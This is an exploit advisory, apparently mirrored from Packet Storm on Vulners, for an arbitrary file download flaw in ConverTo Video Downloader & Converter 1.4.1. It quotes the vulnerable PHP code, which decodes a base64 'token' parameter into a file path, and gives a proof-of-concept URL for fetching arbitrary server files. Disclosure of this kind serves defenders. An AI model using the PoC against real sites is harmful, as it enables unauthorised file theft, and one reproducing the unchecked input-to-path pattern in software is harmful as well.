Lucene search
K

ConverTo Video Downloader And Converter 1.4.1 Arbitrary File Download

🗓️ 01 Oct 2017 00:00:00Reported by Ihsan SencanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 50 Views

ConverTo Video Downloader & Converter 1.4.1 Arbitrary File Download via Security Obligatio

Code
`# # # # #   
# Exploit Title: ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download  
# Dork: N/A  
# Date: 29.09.2017  
# Vendor Homepage: https://codecanyon.net/user/lemonadeflirt  
# Software Link: https://codecanyon.net/item/converto-video-downloader-converter/13225966  
# Demo: http://vd.googglet.com/  
# Version: 1.4.1  
# Category: Webapps  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: N/A  
# # # # #  
# Exploit Author: Ihsan Sencan  
# Author Web: http://ihsan.net  
# Author Social: @ihsansencan  
# # # # #  
# Description:  
# The security obligation allows an attacker to arbitrary download files..  
#  
# Vulnerable Source:  
#  
# .............  
# <?php  
#   
# include_once('.......php');  
# // Check download token  
# if (empty($_GET['mime']) OR empty($_GET['token']))  
# {  
# exit('Invalid download token 8{');  
# }  
#   
# // Set operation params  
# $mime = filter_var($_GET['mime']);  
# $ext = str_replace(array('/', 'x-'), '', strstr($mime, '/'));  
# $url = base64_decode(filter_var($_GET['token']));  
# $name = urldecode($_GET['title']). '.' .$ext;   
#   
# ?>  
# .............  
# Proof of Concept:  
#  
# http://localhost/[PATH]/download.php?mime=video/webm&title=Efe&token=[FILENAME_to_BASE64]  
#   
# Etc...  
# # # # #  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Oct 2017 00:00Current
7.4High risk
Vulners AI Score7.4
50